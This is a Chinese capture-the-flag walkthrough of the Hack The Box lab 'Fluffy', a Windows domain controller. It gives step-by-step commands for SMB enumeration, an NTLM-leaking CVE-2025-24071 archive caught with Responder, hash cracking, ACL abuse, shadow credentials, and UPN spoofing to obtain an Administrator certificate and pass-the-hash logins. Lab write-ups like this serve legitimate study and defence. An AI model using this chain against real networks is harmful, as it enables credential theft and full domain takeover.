hackthebox 第八赛季的新靶机 Fluffy，经历了SMB文件泄露，内网CVE漏洞泄露NTLM，哈希爆破，ACL权限配置不当，UPN伪造等等一系列内网操作，是非常实战的红队靶场，对于攻击者和企业防守方都能从中吸取经验

靶机地址

https://app.hackthebox.com/machines/662

适合读者

√ 渗透测试学习者√ 企业安全运维人员√ CTF竞赛战队√ 想掌握链式攻击思维的安全从业者

一、信息收集

端口扫描

nmap -sT --min-rate 10000 -p- 10.10.11.69 -oA nmapscan/ports

从开放的 88、389、636 等端口初步判断这是一个域控机器

扫一下端口详细信息

nmap -sT -Pn -sV -sC -O -p53,88,139,389,445,593,636,3268,5985,9389,49677,49678,49698,49708,49749 10.10.11.69

果然是域控机器，发现域名fluff.htb，当前机器名是 DC01

域名和 IP 写到 hosts 文件中

echo "10.10.11.69 DC01.fluffy.htb fluffy.htb " >>  /etc/hosts

二、漏洞探测

SMB 共享

靶场给了一个初始账号 j.fleischman / J0elTHEM4n1990!

根据前面的端口开放情况，nxc 爆破一下 SMB、winrm 等服务，winrm 无法登录，但是 smb 可以

枚举一下用户

nxc smb 10.10.11.69 -u j.fleischman -p J0elTHEM4n1990! --users

把枚举出的用户做成字典，用上面的密码喷洒了一下，没发现密码复用

枚举一下共享文件夹，其中 IT 目录很有兴趣，读写权限都有

nxc smb 10.10.11.69 -u j.fleischman -p J0elTHEM4n1990! --shares

smbclient 连接共享目录查看文件

smbclient //10.10.11.69/IT -U j.fleischman%J0elTHEM4n1990!

有 everything、keepass、和一个 pdf 文件，全部 get 下回本地，发现前两者只是软件的安装包，没什么问题，pdf 是个漏洞扫描报告，其中严重级别的有两个 CVE-2025-24996 和 CVE-2025-24071，前者的公开利用信息很少，后者有很多公开利用报道

CVE-2025-24071 漏洞源于Windows文件资源管理器对.library-ms文件的自动解析和隐式信任。攻击者可通过构造包含恶意SMB路径的RAR/ZIP压缩文件，用户在解压时触发SMB认证请求，泄露用户的NTLM哈希

在 GitHub 找到一个 POC：https://github.com/0x6rss/CVE-2025-24071_PoC

根据交互提示信息，输入文件名和攻击机 IP 后，生成一个压缩包

由于对 IT 目录有写入权限，直接把压缩包 put 上去，攻击机开启responder监听，耐心等待目标机器的使用人员打开压缩包

responder -I tun0 -v

成功得到用户p.agila加密的哈希

用 hashcat 爆破，成功爆出密码prometheusx-303

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

但是此用户仍无法 winrm 登录

ACL 提权

bloodhound 分析一下攻击链，远程导出命令，使用上一步获得的 p.agila 用户名和密码

bloodhound-ce-python -d fluffy.htb -u p.agila -p prometheusx-303 -dc dc01.fluffy.htb -c all -ns 10.10.11.69 --zip

p.agila 用户属于SERVICE ACCOUNT MANAGERS组，SERVICE ACCOUNT MANAGERS组对SERVICE ACCOUNTS组有GenericAll权限，那么 p.agila 用户就可以使用此权限把自己加到SERVICE ACCOUNTS组

同时SERVICE ACCOUNTS对下面这三个用户有GenericWrite权限，其中 winrm_svc 用户属于远程管理组，ca_svc 用户属于证书颁发组，显然这两个用户是高价值目标

1. 先把 p.agila 用户加到 SERVICE ACCOUNTS 组

bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p 'prometheusx-303' add groupMember 'Service Accounts' p.agila

2. 尝试 kerberoasting 攻击（失败）

先同步一下时钟，以免时钟偏差导致校验失败

GenericWrite 权限可以进行 kerberoasting

python targetedKerberoast.py -v -d 'fluffy.htb' -u 'p.agila' -p 'prometheusx-303'

执行后获得 winrm_svc、ca_svc、ldap_svc这三个用户的 TGS 票据

hashcat 搜索到对应的模式编号 13100，但是均爆破失败，应该是强密码

3. 影子凭证攻击

除了 kerberoasting，有 GenericWrite 权限还可以进行影子凭证攻击，先弄 winrm_svc 用户

直接一条命令就可以得到哈希

certipy-ad shadow auto -username [email protected] -password 'prometheusx-303' -account ca_svc

使用哈希 winrm 登录成功，得到第一个 flag

evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767

三、权限提升

继续上面同样的操作，获取到 ca_svc 用户的哈希

读取 ca_svc 账户自身的属性

certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -user 'ca_svc' read

从下图属性中的 CN SPN 可以看出该用户是域内证书服务相关的重要角色

证书模板漏洞（失败）

先测试一下有没有可以利用的模板漏洞

certipy-ad find -u [email protected] -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -stdout -vulnerable -dc-ip 10.10.11.69

没有找到任何有漏洞的证书模板，当前域的 CA 是fluffy-DC01-CA

UPN 欺骗

经测试 ca_svc 用户可以修改自己的 UPN (用户主体名称)

如果一个账户能够修改自身的某些关键 AD 属性，并且证书颁发机构 (CA) 在颁发证书时会使用这些属性来确定证书的身份，那么就可以通过临时修改这些属性来“欺骗”CA 颁发一个代表其他用户（如管理员）的证书。UPN 就是这样一个关键属性

# 步骤1：把 ca_svc用户的 UPN 改为administratorcertipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update# 步骤2：向证书颁发机构(CA)请求证书，请求的模板是 user证书模板certipy-ad req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'# 步骤3：把 UPN 改回成ca_svc恢复原貌certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn '[email protected]' -user 'ca_svc' update# 步骤4：使用证书进行认证，得到高权限用户哈希certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip 10.10.11.69

核心逻辑：

1. 1. 攻击者控制的账户 (ca_svc) 拥有修改自身 UPN 的权限
2. 2. 攻击者将 ca_svc 的 UPN 临时修改为目标高权限用户（administrator）的 UPN
3. 3. 攻击者使用 ca_svc 的身份，通过一个普通的、允许当前用户注册的证书模板（如 User），请求一个新的证书
4. 4. CA 根据 AD 中（已被修改的）UPN 信息，错误地颁发了一个带有目标高权限用户身份的证书给 ca_svc
5. 5. 攻击者将 ca_svc 的 UPN 修改回原样
6. 6. 攻击者使用新获取到的高权限用户证书进行认证，完成提权

winrm 登录哈希成功，获得域控最高权限

evil-winrm -i 10.10.11.69 -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e